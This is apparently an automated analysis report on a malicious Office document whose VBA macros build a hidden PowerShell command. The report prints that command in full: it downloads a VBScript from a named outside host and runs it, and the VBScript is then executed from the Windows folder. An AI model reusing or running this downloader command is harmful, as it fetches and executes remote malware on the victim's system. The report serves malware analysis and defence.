Malware Insights
The sample contains VBA macros that utilize the GetObject function, a common technique for executing code. The macros reconstruct a PowerShell command that downloads and executes a VBScript from 'http://achremittanteservices.com/ADP/VAT.vbs'. This VBScript is then executed via 'C:\WINDOWS\System.vbs', indicating a downloader or dropper functionality. The reconstructed PowerShell command is: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://achremittanteservices.com/ADP/VAT.vbs')".
Heuristics 2
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas921d83244c32f5d709ab74c4d50cf06aab7facd93c4eccbbeeeadb2a5439373a |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1260 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.